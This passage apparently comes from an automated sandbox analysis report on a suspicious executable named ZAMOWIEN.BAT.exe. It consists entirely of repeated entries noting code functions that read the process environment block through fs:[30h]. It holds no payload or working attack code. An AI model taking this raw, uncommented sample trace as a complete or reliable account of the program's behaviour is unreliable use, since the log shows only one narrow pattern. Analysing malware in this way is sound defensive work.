          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3772717A mov eax, dword ptr fs:[00000030h]2_2_3772717A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770716D mov eax, dword ptr fs:[00000030h]2_2_3770716D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A3157 mov eax, dword ptr fs:[00000030h]2_2_377A3157
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A3157 mov eax, dword ptr fs:[00000030h]2_2_377A3157
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A3157 mov eax, dword ptr fs:[00000030h]2_2_377A3157
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A5149 mov eax, dword ptr fs:[00000030h]2_2_377A5149
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776D140 mov eax, dword ptr fs:[00000030h]2_2_3776D140
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776D140 mov eax, dword ptr fs:[00000030h]2_2_3776D140
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776314A mov eax, dword ptr fs:[00000030h]2_2_3776314A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776314A mov eax, dword ptr fs:[00000030h]2_2_3776314A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776314A mov eax, dword ptr fs:[00000030h]2_2_3776314A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776314A mov eax, dword ptr fs:[00000030h]2_2_3776314A
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778F13E mov eax, dword ptr fs:[00000030h]2_2_3778F13E
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37707128 mov eax, dword ptr fs:[00000030h]2_2_37707128
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37707128 mov eax, dword ptr fs:[00000030h]2_2_37707128
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D510D mov eax, dword ptr fs:[00000030h]2_2_376D510D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F510F mov eax, dword ptr fs:[00000030h]2_2_376F510F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CF113 mov eax, dword ptr fs:[00000030h]2_2_376CF113
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3776D1F0 mov eax, dword ptr fs:[00000030h]2_2_3776D1F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D91E5 mov eax, dword ptr fs:[00000030h]2_2_376D91E5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D91E5 mov eax, dword ptr fs:[00000030h]2_2_376D91E5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E0 mov eax, dword ptr fs:[00000030h]2_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E0 mov eax, dword ptr fs:[00000030h]2_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E0 mov eax, dword ptr fs:[00000030h]2_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E0 mov eax, dword ptr fs:[00000030h]2_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E0 mov eax, dword ptr fs:[00000030h]2_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E0 mov eax, dword ptr fs:[00000030h]2_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FB1E0 mov eax, dword ptr fs:[00000030h]2_2_376FB1E0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C91F0 mov eax, dword ptr fs:[00000030h]2_2_376C91F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C91F0 mov eax, dword ptr fs:[00000030h]2_2_376C91F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF1F0 mov eax, dword ptr fs:[00000030h]2_2_376FF1F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FF1F0 mov eax, dword ptr fs:[00000030h]2_2_376FF1F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E51C0 mov eax, dword ptr fs:[00000030h]2_2_376E51C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E51C0 mov eax, dword ptr fs:[00000030h]2_2_376E51C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E51C0 mov eax, dword ptr fs:[00000030h]2_2_376E51C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E51C0 mov eax, dword ptr fs:[00000030h]2_2_376E51C0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A51B6 mov eax, dword ptr fs:[00000030h]2_2_377A51B6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377031BE mov eax, dword ptr fs:[00000030h]2_2_377031BE
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377031BE mov eax, dword ptr fs:[00000030h]2_2_377031BE
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711190 mov eax, dword ptr fs:[00000030h]2_2_37711190
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711190 mov eax, dword ptr fs:[00000030h]2_2_37711190
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F9194 mov eax, dword ptr fs:[00000030h]2_2_376F9194
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37779060 mov eax, dword ptr fs:[00000030h]2_2_37779060
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D7072 mov eax, dword ptr fs:[00000030h]2_2_376D7072
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A505B mov eax, dword ptr fs:[00000030h]2_2_377A505B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1051 mov eax, dword ptr fs:[00000030h]2_2_376D1051
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1051 mov eax, dword ptr fs:[00000030h]2_2_376D1051
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CD02D mov eax, dword ptr fs:[00000030h]2_2_376CD02D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F5004 mov eax, dword ptr fs:[00000030h]2_2_376F5004
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376F5004 mov ecx, dword ptr fs:[00000030h]2_2_376F5004
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770D0F0 mov eax, dword ptr fs:[00000030h]2_2_3770D0F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3770D0F0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C90F8 mov eax, dword ptr fs:[00000030h]2_2_376C90F8
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C90F8 mov eax, dword ptr fs:[00000030h]2_2_376C90F8
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C90F8 mov eax, dword ptr fs:[00000030h]2_2_376C90F8
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C90F8 mov eax, dword ptr fs:[00000030h]2_2_376C90F8
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B0D0 mov eax, dword ptr fs:[00000030h]2_2_3777B0D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B0D0 mov eax, dword ptr fs:[00000030h]2_2_3777B0D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777B0D0 mov eax, dword ptr fs:[00000030h]2_2_3777B0D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB0D6 mov eax, dword ptr fs:[00000030h]2_2_376CB0D6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB0D6 mov eax, dword ptr fs:[00000030h]2_2_376CB0D6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB0D6 mov eax, dword ptr fs:[00000030h]2_2_376CB0D6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CB0D6 mov eax, dword ptr fs:[00000030h]2_2_376CB0D6
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EB0D0 mov eax, dword ptr fs:[00000030h]2_2_376EB0D0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_377A50B7 mov eax, dword ptr fs:[00000030h]2_2_377A50B7
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F0A5 mov eax, dword ptr fs:[00000030h]2_2_3777F0A5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F0A5 mov eax, dword ptr fs:[00000030h]2_2_3777F0A5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F0A5 mov eax, dword ptr fs:[00000030h]2_2_3777F0A5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F0A5 mov eax, dword ptr fs:[00000030h]2_2_3777F0A5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F0A5 mov eax, dword ptr fs:[00000030h]2_2_3777F0A5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F0A5 mov eax, dword ptr fs:[00000030h]2_2_3777F0A5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777F0A5 mov eax, dword ptr fs:[00000030h]2_2_3777F0A5
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778B0AF mov eax, dword ptr fs:[00000030h]2_2_3778B0AF
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37757090 mov eax, dword ptr fs:[00000030h]2_2_37757090
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CBF70 mov eax, dword ptr fs:[00000030h]2_2_376CBF70
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1F70 mov eax, dword ptr fs:[00000030h]2_2_376D1F70
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37773F54 mov eax, dword ptr fs:[00000030h]2_2_37773F54
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37773F54 mov eax, dword ptr fs:[00000030h]2_2_37773F54
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777DF5B mov eax, dword ptr fs:[00000030h]2_2_3777DF5B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777DF5B mov eax, dword ptr fs:[00000030h]2_2_3777DF5B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777DF5B mov ecx, dword ptr fs:[00000030h]2_2_3777DF5B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3777DF5B mov eax, dword ptr fs:[00000030h]2_2_3777DF5B
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3778BF4D mov eax, dword ptr fs:[00000030h]2_2_3778BF4D
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EDF36 mov eax, dword ptr fs:[00000030h]2_2_376EDF36
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EDF36 mov eax, dword ptr fs:[00000030h]2_2_376EDF36
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EDF36 mov eax, dword ptr fs:[00000030h]2_2_376EDF36
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376EDF36 mov eax, dword ptr fs:[00000030h]2_2_376EDF36
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CFF30 mov edi, dword ptr fs:[00000030h]2_2_376CFF30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FF03 mov eax, dword ptr fs:[00000030h]2_2_3774FF03
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FF03 mov eax, dword ptr fs:[00000030h]2_2_3774FF03
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FF03 mov eax, dword ptr fs:[00000030h]2_2_3774FF03
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770BF0C mov eax, dword ptr fs:[00000030h]2_2_3770BF0C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770BF0C mov eax, dword ptr fs:[00000030h]2_2_3770BF0C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770BF0C mov eax, dword ptr fs:[00000030h]2_2_3770BF0C
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FFDC mov eax, dword ptr fs:[00000030h]2_2_3774FFDC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FFDC mov eax, dword ptr fs:[00000030h]2_2_3774FFDC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FFDC mov eax, dword ptr fs:[00000030h]2_2_3774FFDC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FFDC mov ecx, dword ptr fs:[00000030h]2_2_3774FFDC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FFDC mov eax, dword ptr fs:[00000030h]2_2_3774FFDC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FFDC mov eax, dword ptr fs:[00000030h]2_2_3774FFDC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CBFC0 mov eax, dword ptr fs:[00000030h]2_2_376CBFC0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376C9FD0 mov eax, dword ptr fs:[00000030h]2_2_376C9FD0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37751FC9 mov eax, dword ptr fs:[00000030h]2_2_37751FC9
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1FAA mov eax, dword ptr fs:[00000030h]2_2_376D1FAA
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376FBF93 mov eax, dword ptr fs:[00000030h]2_2_376FBF93
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37707E71 mov eax, dword ptr fs:[00000030h]2_2_37707E71
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CBE60 mov eax, dword ptr fs:[00000030h]2_2_376CBE60
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CBE60 mov eax, dword ptr fs:[00000030h]2_2_376CBE60
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D1E70 mov eax, dword ptr fs:[00000030h]2_2_376D1E70
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774DE50 mov eax, dword ptr fs:[00000030h]2_2_3774DE50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774DE50 mov eax, dword ptr fs:[00000030h]2_2_3774DE50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774DE50 mov ecx, dword ptr fs:[00000030h]2_2_3774DE50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774DE50 mov eax, dword ptr fs:[00000030h]2_2_3774DE50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774DE50 mov eax, dword ptr fs:[00000030h]2_2_3774DE50
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CDE45 mov eax, dword ptr fs:[00000030h]2_2_376CDE45
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CDE45 mov ecx, dword ptr fs:[00000030h]2_2_376CDE45
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CFE40 mov eax, dword ptr fs:[00000030h]2_2_376CFE40
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765E30 mov eax, dword ptr fs:[00000030h]2_2_37765E30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765E30 mov ecx, dword ptr fs:[00000030h]2_2_37765E30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765E30 mov eax, dword ptr fs:[00000030h]2_2_37765E30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765E30 mov eax, dword ptr fs:[00000030h]2_2_37765E30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765E30 mov eax, dword ptr fs:[00000030h]2_2_37765E30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37765E30 mov eax, dword ptr fs:[00000030h]2_2_37765E30
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FE1F mov eax, dword ptr fs:[00000030h]2_2_3774FE1F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FE1F mov eax, dword ptr fs:[00000030h]2_2_3774FE1F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FE1F mov eax, dword ptr fs:[00000030h]2_2_3774FE1F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3774FE1F mov eax, dword ptr fs:[00000030h]2_2_3774FE1F
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3E01 mov eax, dword ptr fs:[00000030h]2_2_376D3E01
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376CBE18 mov ecx, dword ptr fs:[00000030h]2_2_376CBE18
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3E14 mov eax, dword ptr fs:[00000030h]2_2_376D3E14
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3E14 mov eax, dword ptr fs:[00000030h]2_2_376D3E14
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3E14 mov eax, dword ptr fs:[00000030h]2_2_376D3E14
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37773EFC mov eax, dword ptr fs:[00000030h]2_2_37773EFC
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376D3EE2 mov eax, dword ptr fs:[00000030h]2_2_376D3EE2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701EED mov eax, dword ptr fs:[00000030h]2_2_37701EED
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701EED mov eax, dword ptr fs:[00000030h]2_2_37701EED
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37701EED mov eax, dword ptr fs:[00000030h]2_2_37701EED
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_3770BED0 mov eax, dword ptr fs:[00000030h]2_2_3770BED0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37777ED0 mov ecx, dword ptr fs:[00000030h]2_2_37777ED0
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37711ED8 mov eax, dword ptr fs:[00000030h]2_2_37711ED8
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37799ED2 mov eax, dword ptr fs:[00000030h]2_2_37799ED2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37757EC3 mov eax, dword ptr fs:[00000030h]2_2_37757EC3
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_37757EC3 mov ecx, dword ptr fs:[00000030h]2_2_37757EC3
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov eax, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov ecx, dword ptr fs:[00000030h]2_2_376E1EB2
          Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 2_2_376E1EB2 mov eax, dword ptr fs:[00000030h]2_2_376E1EB2
